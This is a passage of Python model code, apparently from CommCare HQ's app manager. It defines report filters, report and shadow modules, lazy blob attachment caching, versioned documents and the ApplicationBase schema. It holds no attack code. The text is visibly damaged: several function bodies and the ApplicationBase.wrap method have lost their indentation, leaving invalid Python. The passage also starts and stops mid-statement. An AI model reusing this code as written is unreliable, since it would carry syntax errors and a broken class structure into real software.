            ('%s_long' % CAREPLAN_GOAL, self.goal_details.long, True),
            ('%s_short' % CAREPLAN_TASK, self.task_details.short, True),
            ('%s_long' % CAREPLAN_TASK, self.task_details.long, True),
        )
    def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
        """Yield dicts describing case-configuration problems for validation."""
        module_info = self.get_module_info()
        if needs_case_type and not self.case_type:
            yield {
                'type': 'no case type',
                'module': module_info,
            }
        if needs_case_detail:
            if not self.goal_details.short.columns:
                yield {
                    'type': 'no case detail for goals',
                    'module': module_info,
                }
            if not self.task_details.short.columns:
                yield {
                    'type': 'no case detail for tasks',
                    'module': module_info,
                }
            columns = self.goal_details.short.columns + self.goal_details.long.columns
            columns += self.task_details.short.columns + self.task_details.long.columns
            errors = self.validate_detail_columns(columns)
            for error in errors:
                yield error
    def validate_for_build(self):
        errors = super(CareplanModule, self).validate_for_build()
        if not self.forms:
            errors.append({
                'type': 'no forms',
                'module': self.get_module_info(),
            })
        return errors
class ReportGraphConfig(DocumentSchema):
    # Display configuration for a single graph of a mobile report.
    graph_type = StringProperty(
        choices=[
            'bar',
            'time',
            'xy',
        ],
        default='bar',
        required=True,
    )
    # per-series settings; presumably keyed by series id/index — TODO confirm
    series_configs = DictProperty(DictProperty)
    # graph-wide settings passed through to the mobile graphing widget
    config = DictProperty()
class ReportAppFilter(DocumentSchema):
    """Base class for filters attached to a mobile report config.

    `wrap` on the base class dispatches to the concrete subclass named by the
    document's ``doc_type``; subclasses wrap as ordinary DocumentSchemas.
    """
    @classmethod
    def wrap(cls, data):
        if cls is not ReportAppFilter:
            # Concrete subclass: plain DocumentSchema wrapping.
            return super(ReportAppFilter, cls).wrap(data)
        filter_classes = {
            'AutoFilter': AutoFilter,
            'CustomDataAutoFilter': CustomDataAutoFilter,
            'StaticChoiceFilter': StaticChoiceFilter,
            'StaticChoiceListFilter': StaticChoiceListFilter,
            'StaticDatespanFilter': StaticDatespanFilter,
            'CustomDatespanFilter': CustomDatespanFilter,
            'CustomMonthFilter': CustomMonthFilter,
            'MobileSelectFilter': MobileSelectFilter,
            'AncestorLocationTypeFilter': AncestorLocationTypeFilter,
            'NumericFilter': NumericFilter,
        }
        doc_type = data['doc_type']
        if doc_type not in filter_classes:
            raise ValueError('Unexpected doc_type for ReportAppFilter', doc_type)
        return filter_classes[doc_type].wrap(data)
    def get_filter_value(self, user, ui_filter):
        """Return the value to apply for this filter; subclasses implement."""
        raise NotImplementedError
def _filter_by_case_sharing_group_id(user, ui_filter):
    # One Choice per case-sharing group the user belongs to.
    from corehq.apps.reports_core.filters import Choice
    choices = []
    for group in user.get_case_sharing_groups():
        choices.append(Choice(value=group._id, display=None))
    return choices
def _filter_by_location_id(user, ui_filter):
return ui_filter.value(**{ui_filter.name: user.location_id})
def _filter_by_username(user, ui_filter):
    # Single Choice carrying the user's raw username.
    from corehq.apps.reports_core.filters import Choice
    choice = Choice(value=user.raw_username, display=None)
    return choice
def _filter_by_user_id(user, ui_filter):
    # Single Choice carrying the user's couch id.
    from corehq.apps.reports_core.filters import Choice
    choice = Choice(value=user._id, display=None)
    return choice
def _filter_by_parent_location_id(user, ui_filter):
location = user.sql_location
location_parent = location.parent.location_id if location and location.parent else None
return ui_filter.value(**{ui_filter.name: location_parent})
# Maps AutoFilter.filter_type values to the function that computes the
# corresponding filter value for the restoring user.
_filter_type_to_func = {
    'case_sharing_group': _filter_by_case_sharing_group_id,
    'location_id': _filter_by_location_id,
    'parent_location_id': _filter_by_parent_location_id,
    'username': _filter_by_username,
    'user_id': _filter_by_user_id,
}
class AutoFilter(ReportAppFilter):
    # Filter whose value is derived automatically from the restoring user.
    filter_type = StringProperty(choices=_filter_type_to_func.keys())
    def get_filter_value(self, user, ui_filter):
        # Dispatch to the matching _filter_by_* function above.
        return _filter_type_to_func[self.filter_type](user, ui_filter)
class CustomDataAutoFilter(ReportAppFilter):
    # Filter on a field from the user's custom data.
    custom_data_property = StringProperty()
    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        # NOTE(review): raises KeyError if the user lacks this custom data
        # property — confirm that is the intended behavior.
        return Choice(value=user.user_data[self.custom_data_property], display=None)
class StaticChoiceFilter(ReportAppFilter):
    # Always filters on a single fixed value.
    select_value = StringProperty()
    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        # Returned as a one-element list (unlike _filter_by_username, which
        # returns a bare Choice — presumably ui_filter.value accepts both).
        return [Choice(value=self.select_value, display=None)]
class StaticChoiceListFilter(ReportAppFilter):
    # Always filters on a fixed list of values.
    value = StringListProperty()
    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        return [Choice(value=string_value, display=None) for string_value in self.value]
class StaticDatespanFilter(ReportAppFilter):
    # A fixed, named date range (e.g. "last 7 days"), resolved at restore time.
    date_range = StringProperty(
        choices=[
            'last7',
            'last30',
            'thismonth',
            'lastmonth',
            'lastyear',
        ],
        required=True,
    )
    def get_filter_value(self, user, ui_filter):
        start_date, end_date = get_daterange_start_end_dates(self.date_range)
        return DateSpan(startdate=start_date, enddate=end_date)
class CustomDatespanFilter(ReportAppFilter):
    # Datespan defined relative to today in whole days, e.g. ">= N days ago".
    operator = StringProperty(
        choices=[
            '=',
            '<=',
            '>=',
            '>',
            '<',
            'between'
        ],
        required=True,
    )
    # Day offsets are stored as strings and coerced with int() at evaluation time.
    date_number = StringProperty(required=True)
    # second offset, only used by the 'between' operator
    date_number2 = StringProperty()
    def get_filter_value(self, user, ui_filter):
        """Return a DateSpan covering the configured window relative to today.

        A None start/end date leaves that side of the span open.
        """
        today = datetime.date.today()
        start_date = end_date = None
        days = int(self.date_number)
        if self.operator == 'between':
            days2 = int(self.date_number2)
            # allows user to have specified the two numbers in either order
            if days > days2:
                end = days2
                start = days
            else:
                start = days2
                end = days
            # Larger offset => earlier date, so `start` >= `end` here.
            start_date = today - datetime.timedelta(days=start)
            end_date = today - datetime.timedelta(days=end)
        elif self.operator == '=':
            start_date = end_date = today - datetime.timedelta(days=days)
        elif self.operator == '>=':
            # at least `days` ago: open-ended start
            start_date = None
            end_date = today - datetime.timedelta(days=days)
        elif self.operator == '<=':
            # at most `days` ago: open-ended end
            start_date = today - datetime.timedelta(days=days)
            end_date = None
        elif self.operator == '<':
            # strictly fewer than `days` ago, hence the one-day adjustment
            start_date = today - datetime.timedelta(days=days - 1)
            end_date = None
        elif self.operator == '>':
            # strictly more than `days` ago, hence the one-day adjustment
            start_date = None
            end_date = today - datetime.timedelta(days=days + 1)
        return DateSpan(startdate=start_date, enddate=end_date)
def is_lte(integer):
    """Return a validator that raises BadValueError unless value <= `integer`."""
    def validate(candidate):
        if candidate > integer:
            raise BadValueError('Value must be less than or equal to {}'.format(integer))
    return validate
def is_gte(integer):
    """Return a validator that raises BadValueError unless value >= `integer`."""
    def validate(candidate):
        if candidate < integer:
            raise BadValueError('Value must be greater than or equal to {}'.format(integer))
    return validate
class CustomMonthFilter(ReportAppFilter):
    """
    Filter by months that start on a day number other than 1
    See [FB 215656](http://manage.dimagi.com/default.asp?215656)
    """
    # Values for start_of_month < 1 specify the number of days from the end of the month. Values capped at
    # len(February).
    start_of_month = IntegerProperty(
        required=True,
        validators=(is_gte(-27), is_lte(28))
    )
    # DateSpan to return i.t.o. number of months to go back
    period = IntegerProperty(
        default=DEFAULT_MONTH_FILTER_PERIOD_LENGTH,
        validators=(is_gte(0),)
    )
    @classmethod
    def wrap(cls, doc):
        # Coerce legacy string values to ints before schema validation.
        doc['start_of_month'] = int(doc['start_of_month'])
        if 'period' in doc:
            doc['period'] = int(doc['period'] or DEFAULT_MONTH_FILTER_PERIOD_LENGTH)
        return super(CustomMonthFilter, cls).wrap(doc)
    def get_filter_value(self, user, ui_filter):
        """Return the DateSpan of the custom "month" `period` months back."""
        def get_last_month(this_month):
            # Last day of the month preceding `this_month`.
            return datetime.date(this_month.year, this_month.month, 1) - datetime.timedelta(days=1)
        def get_last_day(date):
            # Number of days in `date`'s month.
            _, last_day = calendar.monthrange(date.year, date.month)
            return last_day
        # Find the start and end dates of period 0
        start_of_month = int(self.start_of_month)
        end_date = datetime.date.today()
        # Non-positive start_of_month counts back from the end of the month.
        start_day = start_of_month if start_of_month > 0 else get_last_day(end_date) + start_of_month
        # If today precedes this month's start day, period 0 starts last month.
        end_of_month = end_date if end_date.day >= start_day else get_last_month(end_date)
        start_date = datetime.date(end_of_month.year, end_of_month.month, start_day)
        # Loop over months backwards for period > 0
        for i in range(int(self.period)):
            end_of_month = get_last_month(end_of_month)
            # Each earlier period ends the day before the later one starts.
            end_date = start_date - datetime.timedelta(days=1)
            start_day = start_of_month if start_of_month > 0 else get_last_day(end_of_month) + start_of_month
            start_date = datetime.date(end_of_month.year, end_of_month.month, start_day)
        return DateSpan(startdate=start_date, enddate=end_date)
class MobileSelectFilter(ReportAppFilter):
    # The user picks the filter value on the phone, so nothing is computed here.
    def get_filter_value(self, user, ui_filter):
        return None
class AncestorLocationTypeFilter(ReportAppFilter):
    # Filter on the id of the user's ancestor location of a given type.
    ancestor_location_type_name = StringProperty()
    def get_filter_value(self, user, ui_filter):
        from corehq.apps.locations.models import SQLLocation
        try:
            # include_self=True: the user's own location counts as an ancestor
            ancestor = user.sql_location.get_ancestors(include_self=True).\
                get(location_type__name=self.ancestor_location_type_name)
        except (AttributeError, SQLLocation.DoesNotExist):
            # user.sql_location is None, or location does not have an ancestor of that type
            return None
        return ancestor.location_id
class NumericFilter(ReportAppFilter):
    """Filter comparing a report value against a fixed numeric operand."""
    # Bug fix: a trailing comma after StringProperty(...) previously made
    # `operator` a 1-tuple containing the property, so it was never registered
    # as a document property (and self.operator yielded the tuple itself).
    operator = StringProperty(choices=['=', '!=', '<', '<=', '>', '>='])
    operand = FloatProperty()
    @classmethod
    def wrap(cls, doc):
        # Coerce legacy string operands to float before schema validation.
        doc['operand'] = float(doc['operand'])
        return super(NumericFilter, cls).wrap(doc)
    def get_filter_value(self, user, ui_filter):
        return {
            'operator': self.operator,
            'operand': self.operand,
        }
class ReportAppConfig(DocumentSchema):
    """
    Class for configuring how a user configurable report shows up in an app
    """
    report_id = StringProperty(required=True)
    header = DictProperty()
    # description of the report: either per-language text...
    localized_description = DictProperty()
    # ...or a single xpath expression
    xpath_description = StringProperty()
    use_xpath_description = BooleanProperty(default=False)
    graph_configs = DictProperty(ReportGraphConfig)
    filters = SchemaDictProperty(ReportAppFilter)
    uuid = StringProperty(required=True)
    # class-level sentinel backing the report() cache
    _report = None
    def __init__(self, *args, **kwargs):
        super(ReportAppConfig, self).__init__(*args, **kwargs)
        # every config gets a stable unique id at creation time
        if not self.uuid:
            self.uuid = random_hex()
    @classmethod
    def wrap(cls, doc):
        # for backwards compatibility with apps that have localized or xpath descriptions
        old_description = doc.get('description')
        if old_description:
            if isinstance(old_description, basestring) and not doc.get('xpath_description'):
                doc['xpath_description'] = old_description
            elif isinstance(old_description, dict) and not doc.get('localized_description'):
                doc['localized_description'] = old_description
        if not doc.get('xpath_description'):
            # default to an empty xpath string literal
            doc['xpath_description'] = '""'
        return super(ReportAppConfig, cls).wrap(doc)
    def report(self, domain):
        # NOTE(review): the fetched report config is cached on the instance;
        # `domain` is ignored on subsequent calls — confirm callers always
        # pass the same domain.
        if self._report is None:
            from corehq.apps.userreports.models import get_report_config
            self._report = get_report_config(self.report_id, domain)[0]
        return self._report
class ReportModule(ModuleBase):
    """
    Module for user configurable reports
    """
    module_type = 'report'
    report_configs = SchemaListProperty(ReportAppConfig)
    # report modules have no forms
    forms = []
    _loaded = False
    @property
    @memoized
    def reports(self):
        # The actual report configurations this module's configs point at.
        from corehq.apps.userreports.models import get_report_configs
        return get_report_configs([r.report_id for r in self.report_configs], self.get_app().domain)
    @classmethod
    def new_module(cls, name, lang):
        module = ReportModule(
            name={(lang or 'en'): name or ugettext("Reports")},
            case_type='',
        )
        module.get_or_create_unique_id()
        return module
    def get_details(self):
        from .suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
        return ReportModuleSuiteHelper(self).get_details()
    def get_custom_entries(self):
        from .suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
        return ReportModuleSuiteHelper(self).get_custom_entries()
    def get_menus(self, supports_module_filter=False):
        # Yields this module's single menu, with one command per report config.
        kwargs = {}
        if supports_module_filter:
            kwargs['relevant'] = interpolate_xpath(self.module_filter)
        menu = suite_models.LocalizedMenu(
            id=id_strings.menu_id(self),
            menu_locale_id=id_strings.module_locale(self),
            media_image=bool(len(self.all_image_paths())),
            media_audio=bool(len(self.all_audio_paths())),
            image_locale_id=id_strings.module_icon_locale(self),
            audio_locale_id=id_strings.module_audio_locale(self),
            **kwargs
        )
        menu.commands.extend([
            suite_models.Command(id=id_strings.report_command(config.uuid))
            for config in self.report_configs
        ])
        yield menu
    def check_report_validity(self):
        """
        returns is_valid, valid_report_configs

        If any report doesn't exist, is_valid is False, otherwise True
        valid_report_configs is a list of all report configs that refer to existing reports
        """
        try:
            all_report_ids = [report._id for report in self.reports]
            valid_report_configs = [report_config for report_config in self.report_configs
                                    if report_config.report_id in all_report_ids]
            is_valid = (len(valid_report_configs) == len(self.report_configs))
        except ReportConfigurationNotFoundError:
            valid_report_configs = []  # assuming that if one report is in a different domain, they all are
            is_valid = False
        return namedtuple('ReportConfigValidity', 'is_valid valid_report_configs')(
            is_valid=is_valid,
            valid_report_configs=valid_report_configs
        )
    def validate_for_build(self):
        errors = super(ReportModule, self).validate_for_build()
        if not self.check_report_validity().is_valid:
            errors.append({
                'type': 'report config ref invalid',
                'module': self.get_module_info()
            })
        return errors
class ShadowModule(ModuleBase, ModuleDetailsMixin):
    """
    A module that acts as a shortcut to another module. This module has its own
    settings (name, icon/audio, filter, etc.) and its own case list/detail, but
    inherits case type and forms from its source module.
    """
    module_type = 'shadow'
    # unique id of the module this one shadows
    source_module_id = StringProperty()
    forms = []
    # unique ids of source-module forms to leave out of this module
    excluded_form_ids = SchemaListProperty()
    case_details = SchemaProperty(DetailPair)
    ref_details = SchemaProperty(DetailPair)
    put_in_root = BooleanProperty(default=False)
    case_list = SchemaProperty(CaseList)
    referral_list = SchemaProperty(CaseList)
    task_list = SchemaProperty(CaseList)
    parent_select = SchemaProperty(ParentSelect)
    get_forms = IndexedSchema.Getter('forms')
    @classmethod
    def wrap(cls, data):
        data = cls.wrap_details(data)
        return super(ShadowModule, cls).wrap(data)
    @property
    def source_module(self):
        # The shadowed module, or None if unset or no longer present.
        if self.source_module_id:
            try:
                return self._parent.get_module_by_unique_id(self.source_module_id)
            except ModuleNotFoundException:
                pass
        return None
    @property
    def case_type(self):
        # Delegated to the source module.
        if not self.source_module:
            return None
        return self.source_module.case_type
    @property
    def requires(self):
        if not self.source_module:
            return 'none'
        return self.source_module.requires
    @property
    def root_module_id(self):
        if not self.source_module:
            return None
        return self.source_module.root_module_id
    def get_suite_forms(self):
        # Source module's forms, minus the explicitly excluded ones.
        if not self.source_module:
            return []
        return [f for f in self.source_module.get_forms() if f.unique_id not in self.excluded_form_ids]
    @parse_int([1])
    def get_form(self, i):
        # Shadow modules own no forms of their own.
        return None
    def requires_case_details(self):
        if not self.source_module:
            return False
        return self.source_module.requires_case_details()
    def get_case_types(self):
        if not self.source_module:
            return []
        return self.source_module.get_case_types()
    @memoized
    def get_subcase_types(self):
        if not self.source_module:
            return []
        return self.source_module.get_subcase_types()
    @memoized
    def all_forms_require_a_case(self):
        # NOTE(review): returns [] (falsy) rather than False when there is no
        # source module — confirm callers only rely on truthiness.
        if not self.source_module:
            return []
        return self.source_module.all_forms_require_a_case()
    @classmethod
    def new_module(cls, name, lang):
        lang = lang or 'en'
        # Default single-column "Name" case detail for both short and long views.
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
            )]
        )
        module = ShadowModule(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            case_details=DetailPair(
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
        )
        module.get_or_create_unique_id()
        return module
    def validate_for_build(self):
        errors = super(ShadowModule, self).validate_for_build()
        errors += self.validate_details_for_build()
        if not self.source_module:
            errors.append({
                'type': 'no source module id',
                'module': self.get_module_info()
            })
        return errors
class LazyBlobDoc(BlobMixin):
    """LazyAttachmentDoc for blob db

    Cache blobs in local memory (for this request)
    and in django cache (for the next few requests)
    and commit to couchdb.

    See also `dimagi.utils.couch.lazy_attachment_doc.LazyAttachmentDoc`

    Cache strategy:

    - on fetch, check in local memory, then cache
    - if both are a miss, fetch from couchdb and store in both
    - after an attachment is committed to the blob db and the
      save has succeeded, save the attachment in the cache
    """
    migrating_blobs_from_couch = True
    def __init__(self, *args, **kwargs):
        super(LazyBlobDoc, self).__init__(*args, **kwargs)
        # attachments staged to be written on the next save()
        self._LAZY_ATTACHMENTS = {}
        # to cache fetched attachments
        # these we do *not* send back down upon save
        self._LAZY_ATTACHMENTS_CACHE = {}
    @classmethod
    def wrap(cls, data):
        if "_attachments" in data:
            data = data.copy()
            attachments = data.pop("_attachments").copy()
            if cls.migrating_blobs_from_couch:
                # preserve stubs so couch attachments don't get deleted on save
                stubs = {}
                for name, value in list(attachments.items()):
                    if isinstance(value, dict) and "stub" in value:
                        stubs[name] = attachments.pop(name)
                if stubs:
                    data["_attachments"] = stubs
        else:
            attachments = None
        self = super(LazyBlobDoc, cls).wrap(data)
        if attachments:
            # inline (non-stub) attachment content gets lazily re-staged
            for name, attachment in attachments.items():
                if isinstance(attachment, basestring):
                    info = {"content": attachment}
                else:
                    raise ValueError("Unknown attachment format: {!r}"
                                     .format(attachment))
                self.lazy_put_attachment(name=name, **info)
        return self
    def __attachment_cache_key(self, name):
        return u'lazy_attachment/{id}/{name}'.format(id=self.get_id, name=name)
    def __set_cached_attachment(self, name, content):
        # one day in the shared cache; for this request in local memory
        cache.set(self.__attachment_cache_key(name), content, timeout=60 * 60 * 24)
        self._LAZY_ATTACHMENTS_CACHE[name] = content
    def __get_cached_attachment(self, name):
        try:
            # it has been fetched already during this request
            content = self._LAZY_ATTACHMENTS_CACHE[name]
        except KeyError:
            content = cache.get(self.__attachment_cache_key(name))
            if content is not None:
                self._LAZY_ATTACHMENTS_CACHE[name] = content
        return content
    def put_attachment(self, content, name=None, *args, **kw):
        # invalidate both cache layers before writing through
        cache.delete(self.__attachment_cache_key(name))
        self._LAZY_ATTACHMENTS_CACHE.pop(name, None)
        return super(LazyBlobDoc, self).put_attachment(content, name, *args, **kw)
    def lazy_put_attachment(self, content, name=None, content_type=None,
                            content_length=None):
        """
        Ensure the attachment is available through lazy_fetch_attachment
        and that upon self.save(), the attachments are put to the doc as well
        """
        self._LAZY_ATTACHMENTS[name] = {
            'content': content,
            'content_type': content_type,
            'content_length': content_length,
        }
    def lazy_fetch_attachment(self, name):
        # it has been put/lazy-put already during this request
        if name in self._LAZY_ATTACHMENTS:
            content = self._LAZY_ATTACHMENTS[name]['content']
        else:
            content = self.__get_cached_attachment(name)
            if content is None:
                try:
                    content = self.fetch_attachment(name)
                except ResourceNotFound as e:
                    # django cache will pickle this exception for you
                    # but e.response isn't picklable
                    if hasattr(e, 'response'):
                        del e.response
                    content = e
                    raise
                finally:
                    # cache the content — or the not-found exception, so a
                    # later fetch can re-raise without hitting couch again
                    self.__set_cached_attachment(name, content)
        if isinstance(content, ResourceNotFound):
            # a cached miss from a previous request
            raise content
        return content
    def lazy_list_attachments(self):
        # union of staged (unsaved) attachment names and persisted blob names
        keys = set()
        keys.update(getattr(self, '_LAZY_ATTACHMENTS', None) or {})
        keys.update(self.blobs or {})
        return keys
    def save(self, **params):
        def super_save():
            super(LazyBlobDoc, self).save(**params)
        if self._LAZY_ATTACHMENTS:
            # commit staged attachments atomically with the doc save
            with self.atomic_blobs(super_save):
                for name, info in self._LAZY_ATTACHMENTS.items():
                    if not info['content_type']:
                        info['content_type'] = ';'.join(filter(None, guess_type(name)))
                    super(LazyBlobDoc, self).put_attachment(name=name, **info)
            # super_save() has succeeded by now
            for name, info in self._LAZY_ATTACHMENTS.items():
                self.__set_cached_attachment(name, info['content'])
            self._LAZY_ATTACHMENTS.clear()
        else:
            super_save()
class VersionedDoc(LazyBlobDoc):
    """
    A document that keeps an auto-incrementing version number, knows how to make copies of itself,
    delete a copy of itself, and revert back to an earlier copy of itself.
    """
    domain = StringProperty()
    # id of the doc this one is a build/copy of; None on the primary doc
    copy_of = StringProperty()
    version = IntegerProperty()
    short_url = StringProperty()
    short_odk_url = StringProperty()
    short_odk_media_url = StringProperty()
    # fields stripped when exporting/importing the doc as app source
    _meta_fields = ['_id', '_rev', 'domain', 'copy_of', 'version', 'short_url', 'short_odk_url', 'short_odk_media_url']
    @property
    def id(self):
        return self._id
    def save(self, response_json=None, increment_version=None, **params):
        # Builds (copies) keep their version fixed by default.
        if increment_version is None:
            increment_version = not self.copy_of
        if increment_version:
            self.version = self.version + 1 if self.version else 1
        super(VersionedDoc, self).save(**params)
        if response_json is not None:
            if 'update' not in response_json:
                response_json['update'] = {}
            response_json['update']['app-version'] = self.version
    def make_build(self):
        """Return a build copy of this doc at the current version, reusing an
        existing copy for this exact version when one is found. Not saved here."""
        assert self.get_id
        assert self.copy_of is None
        cls = self.__class__
        copies = cls.view('app_manager/applications', key=[self.domain, self._id, self.version], include_docs=True, limit=1).all()
        if copies:
            copy = copies[0]
        else:
            copy = deepcopy(self.to_json())
            bad_keys = ('_id', '_rev', '_attachments', 'external_blobs',
                        'short_url', 'short_odk_url', 'short_odk_media_url', 'recipients')
            for bad_key in bad_keys:
                if bad_key in copy:
                    del copy[bad_key]
            copy = cls.wrap(copy)
            copy['copy_of'] = self._id
            copy.copy_attachments(self)
        return copy
    def copy_attachments(self, other, regexp=ATTACHMENT_REGEX):
        # lazily copy every attachment whose name matches `regexp`
        # (regexp=None copies everything)
        for name in other.lazy_list_attachments() or {}:
            if regexp is None or re.match(regexp, name):
                self.lazy_put_attachment(other.lazy_fetch_attachment(name), name)
    def make_reversion_to_copy(self, copy):
        """
        Replaces couch doc with a copy of the backup ("copy").
        Returns another Application/RemoteApp referring to this
        updated couch doc. The returned doc should be used in place of
        the original doc, i.e. should be called as follows:
            app = app.make_reversion_to_copy(copy)
            app.save()
        """
        if copy.copy_of != self._id:
            raise VersioningError("%s is not a copy of %s" % (copy, self))
        app = deepcopy(copy.to_json())
        # keep this doc's identity and version; clear the copy linkage
        app['_rev'] = self._rev
        app['_id'] = self._id
        app['version'] = self.version
        app['copy_of'] = None
        app.pop('_attachments', None)
        app.pop('external_blobs', None)
        cls = self.__class__
        app = cls.wrap(app)
        app.copy_attachments(copy)
        return app
    def delete_copy(self, copy):
        if copy.copy_of != self._id:
            raise VersioningError("%s is not a copy of %s" % (copy, self))
        copy.delete_app()
        # persist the deleted state without bumping the version
        copy.save(increment_version=False)
    def scrub_source(self, source):
        """
        To be overridden.

        Use this to scrub out anything
        that should not be shown in the
        application source, such as ids, etc.
        """
        return source
    def export_json(self, dump_json=True):
        """Serialize this doc (minus meta fields) plus its attachments."""
        source = deepcopy(self.to_json())
        for field in self._meta_fields:
            if field in source:
                del source[field]
        _attachments = {}
        for name in self.lazy_list_attachments():
            if re.match(ATTACHMENT_REGEX, name):
                # FIXME loss of metadata (content type, etc.)
                _attachments[name] = self.lazy_fetch_attachment(name)
        # the '_attachments' value is a dict of `name: blob_content`
        # pairs, and is part of the exported (serialized) app interface
        source['_attachments'] = _attachments
        source.pop("external_blobs", None)
        source = self.scrub_source(source)
        return json.dumps(source) if dump_json else source
    @classmethod
    def from_source(cls, source, domain):
        # inverse of export_json(dump_json=False)
        for field in cls._meta_fields:
            if field in source:
                del source[field]
        source['domain'] = domain
        app = cls.wrap(source)
        return app
    def is_deleted(self):
        return self.doc_type.endswith(DELETED_SUFFIX)
    def unretire(self):
        # restore a soft-deleted doc by stripping the deleted suffix
        self.doc_type = self.get_doc_type()
        self.save()
    def get_doc_type(self):
        if self.doc_type.endswith(DELETED_SUFFIX):
            return self.doc_type[:-len(DELETED_SUFFIX)]
        else:
            return self.doc_type
def absolute_url_property(method):
    """Turn a method returning a relative URL into a property returning a
    fully qualified one.

    The wrapped method's result is prefixed with ``self.url_base``
    (e.g. '/my_url/' => 'https://www.commcarehq.org/my_url/'), which must be
    a fully qualified URL base.
    """
    @wraps(method)
    def _fully_qualified(self):
        relative_url = method(self)
        return self.url_base + relative_url
    return property(_fully_qualified)
class BuildProfile(DocumentSchema):
    # A named subset of the app's languages to build against.
    name = StringProperty()
    langs = StringListProperty()
    def __eq__(self, other):
        # NOTE(review): equality deliberately(?) ignores `name`, and assumes
        # `other` has a `langs` attribute — comparing against an arbitrary
        # object raises AttributeError. Confirm both are intended.
        return self.langs == other.langs
    def __ne__(self, other):
        return not self.__eq__(other)
class MediaList(DocumentSchema):
    # multimedia paths referenced by a single language
    media_refs = StringListProperty()
class ApplicationBase(VersionedDoc, SnapshotMixin,
                      CommCareFeatureSupportMixin,
                      CommentMixin):
    """
    Abstract base class for Application and RemoteApp.
    Contains methods for generating the various files and zipping them into CommCare.jar
    See note at top of file for high-level overview.
    """
    recipients = StringProperty(default="")
    # this is the supported way of specifying which commcare build to use
    build_spec = SchemaProperty(BuildSpec)
    platform = StringProperty(
        choices=["nokia/s40", "nokia/s60", "winmo", "generic"],
        default="nokia/s40"
    )
    text_input = StringProperty(
        choices=['roman', 'native', 'custom-keys', 'qwerty'],
        default="roman"
    )
    # The following properties should only appear on saved builds
    # built_with stores a record of CommCare build used in a saved app
    built_with = SchemaProperty(BuildRecord)
    build_signed = BooleanProperty(default=True)
    built_on = DateTimeProperty(required=False)
    build_comment = StringProperty()
    comment_from = StringProperty()
    build_broken = BooleanProperty(default=False)
    # not used yet, but nice for tagging/debugging
    # currently only canonical value is 'incomplete-build',
    # for when build resources aren't found where they should be
    build_broken_reason = StringProperty()
    # watch out for a past bug:
    # when reverting to a build that happens to be released
    # that got copied into the new app doc, and when new releases were made,
    # they were automatically starred
    # AFAIK this is fixed in code, but may rear its ugly head in an as-yet-not-understood
    # way for apps that already had this problem. Just keep an eye out
    is_released = BooleanProperty(default=False)
    # django-style salted hash of the admin password
    admin_password = StringProperty()
    # a=Alphanumeric, n=Numeric, x=Neither (not allowed)
    admin_password_charset = StringProperty(choices=['a', 'n', 'x'], default='n')
    # This is here instead of in Application because it needs to be available in stub representation
    application_version = StringProperty(default=APP_V2, choices=[APP_V1, APP_V2], required=False)
    langs = StringListProperty()
    secure_submissions = BooleanProperty(default=False)
    # metadata for data platform
    amplifies_workers = StringProperty(
        choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
        default=AMPLIFIES_NOT_SET
    )
    amplifies_project = StringProperty(
        choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
        default=AMPLIFIES_NOT_SET
    )
    minimum_use_threshold = StringProperty(
        default='15'
    )
    experienced_threshold = StringProperty(
        default='3'
    )
    # exchange properties
    cached_properties = DictProperty()
    description = StringProperty()
    deployment_date = DateTimeProperty()
    phone_model = StringProperty()
    user_type = StringProperty()
    attribution_notes = StringProperty()
    # always false for RemoteApp
    case_sharing = BooleanProperty(default=False)
    vellum_case_management = BooleanProperty(default=False)
    # named language-subset profiles available when building
    build_profiles = SchemaDictProperty(BuildProfile)
    # each language is a key and the value is a list of multimedia referenced in that language
    media_language_map = SchemaDictProperty(MediaList)
    use_j2me_endpoint = BooleanProperty(default=False)
    # Whether or not the Application has had any forms submitted against it
    has_submissions = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
should_save = False
# scrape for old conventions and get rid of them
if 'commcare_build' in data:
version, build_number = data['commcare_build'].split('/')
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_build']
if 'commcare_tag' in data:
version, build_number = current_builds.TAG_MAP[data['commcare_tag']]
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_tag']
if data.has_key("built_with") and isinstance(data['built_with'], basestring):
data['built_with'] = BuildSpec.from_string(data['built_with']).to_json()
if 'native_input' in data:
if 'text_input' not in data:
data['text_input'] = 'native' if data['native_input'] else 'roman'
del data['native_input']
if 'build_langs' in data:
if data['build_langs'] != data['langs'] and 'build_profiles' not in data:
data['build_profiles'] = {
uuid.uuid4().hex: dict(
name=', '.join(data['build_langs']),
langs=data['build_langs']
)
}
should_save = True
del data['build_langs']
if data.has_key('original_doc'):
data['copy_history'] = [data.pop('original_doc')]
should_save = True
data["description"] = data.get('description') or data.get('short_description')
self = super(ApplicationBase, cls).wrap(data)
if not self.build_spec or self.build_spec.is_null():
self.build_spec = get_default_build_spec(self.application_version)
if should_save:
self.save()
return self
    def rename_lang(self, old_lang, new_lang):
        # NOTE(review): only validates the new language code here; subclasses
        # appear to perform the actual renaming — confirm.
        validate_lang(new_lang)
    def is_remote_app(self):
        # presumably overridden to return True on RemoteApp — confirm
        return False
    def get_latest_app(self, released_only=True):
        """Return the latest build of this app: the latest released build when
        `released_only`, otherwise the most recent saved build."""
        if released_only:
            return get_app(self.domain, self.get_id, latest=True)
        else:
            return self.view('app_manager/applications',
                startkey=[self.domain, self.get_id, {}],
                endkey=[self.domain, self.get_id],
                include_docs=True,
                limit=1,
                descending=True,
            ).first()
    @memoized
    def get_latest_saved(self):
        """Return the latest released build if any, else the latest build,
        else None. (Similar to get_latest_app.)"""
        doc = (get_latest_released_app_doc(self.domain, self._id) or
               get_latest_build_doc(self.domain, self._id))
        return self.__class__.wrap(doc) if doc else None
    def set_admin_password(self, raw_password):
        """Hash and store the admin password, recording its charset class."""
        # Python 2 only: the 'hex' str codec does not exist on Python 3
